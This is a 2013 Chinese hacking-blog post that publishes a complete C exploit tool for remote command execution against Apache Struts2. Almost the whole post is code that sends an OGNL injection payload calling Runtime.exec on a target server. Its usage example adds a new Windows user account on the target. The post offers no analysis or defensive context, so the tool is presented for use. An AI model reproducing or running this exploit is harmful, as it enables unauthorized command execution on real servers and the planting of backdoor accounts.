注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

C语言版 Struts2 remote command exploit 2010  

2013-06-10 10:55:35|  分类: C/C++ |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

Struts2 remote command exploit
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

SOCKET sock;
struct sockaddr_in client;
WSADATA wsa;
struct hostent *host;

int InitSocket(char *Host,unsigned int Port)
{

if(WSAStartup(MAKEWORD(2,2),&wsa) != 0)
{
printf("[-]WSAStartup Error!\r\n");
return 0;
}
try
{
host = gethostbyname(Host);
memcpy(&client.sin_addr.S_un.S_addr,host->h_addr_list[0],sizeof(host->h_addr_list[0]));
client.sin_family = AF_INET;
client.sin_port = htons(Port);
}catch(...)
{
printf("[-]socket_inaddr init error!\r\n");
return 0;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock == SOCKET_ERROR)
{
printf("[-]socket create error!\r\n");
WSACleanup();
return 0;
}
printf("[+]Socket Init success!\r\n");

return 1;
}

int ConnectServer(char *Host,unsigned int Port)
{
printf("Init socket...\r\n");
if(!InitSocket(Host,Port)) return 0;
printf("Connect the Server...\r\n");
if(connect(sock,(struct sockaddr *)&client,sizeof(client)) == SOCKET_ERROR)
{
printf("[-]Connect Error!\r\n");
closesocket(sock);
WSACleanup();
return 0;
}
printf("[+]Connect successfull!\r\n");
return 1;
}

char *HttpGet(char *Host,unsigned int Port,char *Req)
{
int size;
char http_header[] = "GET /%s  HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: zh-cn,zh;q=0.5\r\n"
"Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n"
"Connection: Closed\r\n\r\n";
char req_buf[4096],recvbuf[20480],*ret;
sprintf(req_buf,http_header,Req,Host);
if(!ConnectServer(Host,Port)) exit(0);
printf("Send payload:\r\n%s\r\n",req_buf);
size = send(sock,req_buf,strlen(req_buf),0);
printf("[+]send payload %d bytes!\r\n",size);
size = recv(sock,recvbuf,sizeof(recvbuf),0);
printf("[+]Response:\r\n%s\r\n",recvbuf);
ret = size > 0 ? recvbuf : NULL;

closesocket(sock);
WSACleanup();

return ret;
}

void usage()
{
printf("\t\tStruts2 Remote Command Exploit\r\n\t\t\t\t\t\t\tconcat:ylbhz@hotmail.com\r\n");
printf("Usage: struts2exp <target> <port> <reqfile> <cmd>\r\n");
printf("Example: struts2exp localhost 8080 struts2Test/index.action \"net user ylbhz 123 /add\"\r\n\r\n");
exit(-1);
}
char *handlecmd(char *cmd) //处理cmd命令,替换空格为+
{
char *ret = (char*)malloc(sizeof(char)*256);
int i = 0;
char tmp;
while(tmp = cmd[i])
{
if(tmp == ' ')
ret[i] = '+';
else
ret[i] = tmp;
i ++;
}
ret[i] = NULL;
return ret;
}
void main(int argc,char *argv[])
{
if(argc != 5) usage();
unsigned int Port = (unsigned int)atoi(argv[2]);
if(Port <= 0) usage();
char *Target = argv[1];
char *ReqFile = argv[3];
char *cmd = argv[4];

char payload[] = "%s?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew+java.lang.Boolean(\"false\")))&(asdf)(('\\u0023rt.exec(\"%s\")')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()))=1";
char sendbuf[2048];
sprintf(sendbuf,payload,ReqFile,handlecmd(cmd));
HttpGet(Target,Port,sendbuf);
}
  评论这张
 
阅读(1521)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016